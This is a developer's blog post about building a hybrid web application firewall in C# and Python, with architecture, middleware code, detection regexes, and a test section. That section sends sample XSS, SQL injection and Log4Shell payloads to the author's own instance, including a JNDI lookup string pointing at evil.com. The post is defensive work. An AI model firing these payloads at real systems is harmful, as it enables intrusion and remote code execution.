DEV Community

Patryk
Patryk

Posted on

I Built a Hybrid WAF in C# and Python After 8 Months of Learning — Here's Everything I Learned

The Honest Truth First

I've been coding for 8 months. Not years. Eight months.

When I tell people what I built, they usually assume I'm exaggerating or that I just glued some libraries together. So let me be upfront: ShieldX is a fully custom Web Application Firewall combining a .NET 10 reverse proxy with a Python deep inspection engine, connected through a Redis event bus, with a real-time SOC dashboard powered by SignalR.

Is it perfect? No. Is it production-ready for Fortune 500? Probably not yet. But it detects SQLi, XSS, Log4Shell, Command Injection, and Path Traversal — and it does it in under 5ms for the standalone mode and under 10ms in hybrid mode. I'm proud of it, and I want to share exactly how it works and what I learned building it.


Why I Built This

I wasn't trying to reinvent Cloudflare. I wanted to understand how WAFs actually work under the hood. Every time I used tools like AWS WAF or ModSecurity, they felt like black boxes. Rules go in, traffic comes out filtered — but why? How?

So I decided to build one myself. From scratch.

The first version was a mess — a Python script with a handful of regex patterns that blocked anything with "SELECT" in it (which, embarrassingly, also blocked my own admin queries). Over the next few months, it evolved into something I'm genuinely proud of.


The Architecture — Two Engines, One System

The core idea behind ShieldX is simple: use the right tool for each job.

  • .NET 10 is incredibly fast for high-throughput request processing. It handles TLS, rate limiting, GeoIP filtering, URL anomaly detection, and caching. Sub-millisecond response times on the hot path.
  • Python is flexible and expressive for deep pattern matching. It handles POST/PUT body scanning — the kind of deep inspection where you need to decode URL-encoded payloads, strip encoding tricks, and run complex regex across request bodies.
  • Redis acts as the glue — a shared event bus and ban store that lets both engines communicate in real time.

Here's the high-level flow:

Incoming Request
      │
      ▼
.NET 10 Gateway (YARP / Kestrel)
  ├── GeoIP filtering (MaxMind)
  ├── Browser fingerprinting (SHA-256)
  ├── L7 URL/header anomaly detection
  ├── Rate limiting (30 req/10s)
  └── L1/L2 ban cache (IMemoryCache + Redis)
      │
      │ [Hybrid mode only]
      ▼
Python Intelligence Engine (FastAPI)
  ├── DPI body scan (POST/PUT up to 64KB)
  ├── SQLi, XSS, Log4Shell, CMDi detection
  ├── Threat scoring (0–100)
  └── Binary content guard (skips image/*, video/*, PDF)
      │
      ▼
Redis Event Bus
  ├── shieldx:bans:ip
  ├── shieldx:events:rate_limit
  └── shieldx:events:suspect
      │
      ▼
Real-time SOC Dashboard (SignalR)
Enter fullscreen mode Exit fullscreen mode

There are two modes:

Feature Standalone (.NET) Hybrid (.NET + Python)
Setup Single process Two processes + Redis
Latency overhead Sub-millisecond ~2–5ms
Body scanning ✓ POST/PUT up to 64KB
Log4Shell detection
Threat scoring Heuristic (0–100) Heuristic + Regex (0–100)
Rate limiting ✓ 30 req/10s ✓ 100 req/min sliding window

The .NET Gateway — Speed First

The .NET side uses YARP (Yet Another Reverse Proxy) as the foundation, running on Kestrel with TLS 1.2/1.3 enforced. I didn't want to write my own HTTP server — YARP handles the proxy mechanics, and I layered my WAF logic on top as ASP.NET middleware.

The Blocking Pipeline

Every request goes through this chain:

Whitelist → L1 Cache → Geo-IP → L7 Defense → [Python DPI] → Bot Score → Rate Limit → Allow
Enter fullscreen mode Exit fullscreen mode

Whitelist — trusted IPs bypass everything. Useful for your own monitoring systems.

L1/L2 ban cache — this was a key performance decision. I use IMemoryCache as L1 (in-process, nanosecond lookups) and Redis as L2 (cross-node synchronization). On a cache hit, the request is rejected before any expensive logic runs.

// L1 cache check - fastest path
if (cache.TryGetValue($"ban:{ip}", out _))
{
    ctx.Response.StatusCode = 403;
    await ctx.Response.WriteAsJsonAsync(new
    {
        status = "BANNED",
        msg = "Your IP is blocked by Shield-X."
    });
    return;
}
Enter fullscreen mode Exit fullscreen mode

Browser fingerprinting — I generate a SHA-256 fingerprint from a combination of headers (User-Agent, Accept-Language, Accept-Encoding, etc.). This catches bots that rotate IPs but keep the same browser signature. When the bot score hits 60, I ban the fingerprint. At 80, I ban both the fingerprint and the IP.

GeoIP — using MaxMind GeoLite2. Simple country-level blocking. Not the most sophisticated approach but effective for filtering out high-risk regions.

Redis Pub/Sub for Cross-Process Communication

When Python bans an IP, it publishes to shieldx:bans:ip. The .NET process has a subscriber running from startup:

await subscriber.SubscribeAsync(
    RedisChannel.Literal("shieldx:bans:ip"),
    async (_, msg) =>
    {
        string ip = msg.ToString();
        string reason = (await db.StringGetAsync($"shieldx:ban:{ip}"))
            .ToString() ?? "Python WAF detection";

        cache.Set($"ban:{ip}", true, banDuration);
        await PushEvent("ban", ip, reason, score: 90);
    });
Enter fullscreen mode Exit fullscreen mode

This means a ban applied by Python propagates to .NET's local cache within milliseconds — no polling, no delay.


The Python Engine — Intelligence Layer

The Python engine runs as a FastAPI ASGI application with a custom middleware class that intercepts every request before it reaches the route handler.

Why Python for This Layer?

I get asked this a lot. "Why not just do everything in C#?"

Regex in Python is fast, expressive, and the ecosystem for security pattern development is mature. I could have ported everything to C#, but for the DPI layer, I wanted the flexibility to iterate quickly on patterns without recompiling the .NET project every time. Python lets me hot-reload the detection engine independently.

Also — and this is the honest reason — I wanted to learn both languages deeply. Building a hybrid system forced me to think carefully about where each language excels.

Attack Detection Patterns

The most interesting part is the threat scoring system. Instead of binary block/allow, every request gets a score from 0 to 100:

ATTACK_PATTERNS: dict[str, tuple[int, str]] = {
    "SQL_INJECTION": (
        90,
        r"(?i)(\b(union\s+select|select\s+[\w\*]+\s+from|drop\s+table|"
        r"insert\s+into\s+\w+|update\s+\w+\s+set|delete\s+from|"
        r"exec\s*\(|execute\s*\(|xp_\w+|sp_\w+|"
        r"sleep\s*\(\d+\)|benchmark\s*\(|waitfor\s+delay)\b|"
        r"--\s*$|/\*.*?\*/|'\s*(or|and)\s*'?\d|\bor\b\s+\d+=\d+)",
    ),
    "LOG4J": (
        100,
        r"(?i)\$\{(?:jndi|lower|upper|:+|-+)\s*:",
    ),
    # ... more patterns
}
Enter fullscreen mode Exit fullscreen mode

Score thresholds:

  • ≥ 80 → immediate ban, event published to Redis
  • 40–79 → logged as suspect, forwarded to dashboard, request allowed
  • < 40 → clean, passes through

This gradation matters. A request with document.cookie in a query parameter isn't necessarily malicious — it might be a legitimate analytics tag. Logging it as suspicious without blocking gives you visibility without false positives.

Body Scanning — The Hard Part

Reading the request body in ASGI middleware is tricky because once you consume the stream, it's gone. You need to buffer it and reconstruct it for the actual route handler:

async def analyze_request(request: Request) -> tuple[int, str, bytes]:
    body_bytes = b""
    chunks: list[bytes] = []
    total = 0

    async for chunk in request.stream():
        total += len(chunk)
        if total > MAX_BODY_READ_BYTES:  # 10MB limit
            return 999, "BODY_TOO_LARGE", b""
        chunks.append(chunk)

    body_bytes = b"".join(chunks)

    # Reconstruct stream for the next handler
    async def receive_patched():
        return {"type": "http.request", "body": body_bytes, "more_body": False}

    request._receive = receive_patched
    return score, reason, body_bytes
Enter fullscreen mode Exit fullscreen mode

I also skip body scanning for binary content types (image/*, video/*, application/pdf) — there's no point running regex on a JPEG.


The Real-Time SOC Dashboard

The dashboard uses SignalR for WebSocket-based push events. Every ban, rate limit hit, or suspicious request appears in the live feed within milliseconds.

When Python detects an attack:

  1. It writes the ban to Redis (shieldx:ban:{ip})
  2. It publishes to shieldx:bans:ip channel
  3. .NET subscriber fires, updates its local cache
  4. .NET calls hubCtx.Clients.All.SendAsync("ShieldEvent", payload)
  5. Dashboard JavaScript receives the event and updates the UI

The whole chain — from Python detecting the attack to the dashboard showing the ban — takes under 50ms in practice.


Testing It — Live Attack Demo

Here's what the system looks like under actual attack traffic. I tested with curl from a local machine and from a separate device on the same network.

XSS Detection

curl -X POST http://localhost:8000/ \
  -H "Content-Type: text/plain" \
  -d "<script>alert(1)</script>"
Enter fullscreen mode Exit fullscreen mode

Result:

{"status": "BLOCKED", "threat": "XSS", "score": 85}
Enter fullscreen mode Exit fullscreen mode

Python log:

[SCAN] IP=192.168.1.179 PATH=/ BODY_SIZE=25B BINARY=False
[ERROR] [BLOCKED] 192.168.1.179 - XSS (score=85)
[WARNING] [BAN] 192.168.1.179 banned for: XSS
Enter fullscreen mode Exit fullscreen mode

Log4Shell Detection

curl -X POST http://localhost:8000/ \
  -H "Content-Type: text/plain" \
  -d '${jndi:ldap://evil.com/x}'
Enter fullscreen mode Exit fullscreen mode

Result:

{"status": "BLOCKED", "threat": "LOG4J", "score": 100}
Enter fullscreen mode Exit fullscreen mode

Log4Shell gets score 100 — immediate ban, no questions asked.

SQL Injection

curl "http://192.168.1.45:8000/?id=1+UNION+SELECT+*+FROM+users--"
Enter fullscreen mode Exit fullscreen mode

Result:

403 Forbidden
{"status": "BLOCKED", "threat": "SQL_INJECTION", "score": 90}
Enter fullscreen mode Exit fullscreen mode

Rate Limiting

for i in $(seq 1 110); do curl -s http://localhost:8000/ > /dev/null; done
Enter fullscreen mode Exit fullscreen mode

After 100 requests in 60 seconds:

429 Too Many Requests
{"status": "RATE_LIMITED", "msg": "Too many requests. Slow down."}
Enter fullscreen mode Exit fullscreen mode


What I Got Wrong (And Fixed)

False positives on apostrophes — my first SQLi pattern was too aggressive. A search query like O'Brien would trigger a block. I rewrote the patterns to require combinations of SQL keywords, not just individual characters.

Body stream consumption — early versions of the Python middleware consumed the body and never restored it. The actual application never received the POST data. The receive_patched pattern above was the fix.

Cache invalidation — when an IP gets unbanned via the REST API, I need to remove it from both Redis and the local IMemoryCache. Missing either one means the ban persists longer than intended.

Loopback bypass — the .NET middleware skips all checks for loopback addresses (127.0.0.1). This is intentional for the dashboard and API endpoints, but it means you can't test attack detection from localhost — you need to come from an external IP.


Architecture Decisions I'd Make Differently

Single binary deployment — running two processes (Python + .NET) adds operational complexity. For a production deployment, I'd consider replacing the Python engine with a native .NET implementation using compiled regex, or packaging everything in a Docker Compose file with proper health checks.

GeoIP database — MaxMind requires registration and the database needs periodic updates. I'd automate this with a GitHub Action that refreshes the .mmdb file weekly.

Metrics — the current dashboard shows events but no aggregate metrics over time. I'd add a time-series store (InfluxDB or even just Redis sorted sets) to show attack trends, peak hours, and top attack sources.


What I Learned

Building ShieldX taught me more about web security in a few months than I'd learned in years of reading about it. A few specific things:

Regex is not enough. Pattern matching catches known signatures, but sophisticated attackers use encoding tricks, Unicode normalization, and payload fragmentation to evade simple regex. A production WAF needs semantic analysis, not just string matching.

The performance gap between languages is real but manageable. The Python DPI layer adds 2–5ms per request. For most APIs, that's acceptable. For high-frequency trading or real-time gaming, it wouldn't be.

Redis is underrated as middleware. Using it as a pub/sub bus between two independent processes is clean and effective. The shieldx:bans:ip channel pattern made cross-language communication trivial.

Building something real teaches you what tutorials can't. Every bug I hit — the body stream consumption issue, the false positive patterns, the SignalR event name mismatch — taught me something that no course would have covered.


Source Code

The full source is on GitHub:


What's Next

  • [ ] Automated GeoIP database updates
  • [ ] ML-based anomaly detection (moving beyond regex)
  • [ ] Docker Compose packaging for easy deployment
  • [ ] Aggregate metrics dashboard with time-series data
  • [ ] HTTPS support with automatic Let's Encrypt certificates

Built in 8 months of learning. If you're early in your coding journey and wondering whether you're doing enough — just build something real. The bugs will teach you.


If you found this useful, drop a ❤️ or leave a comment. I'm always looking for feedback on what to improve.

Top comments (0)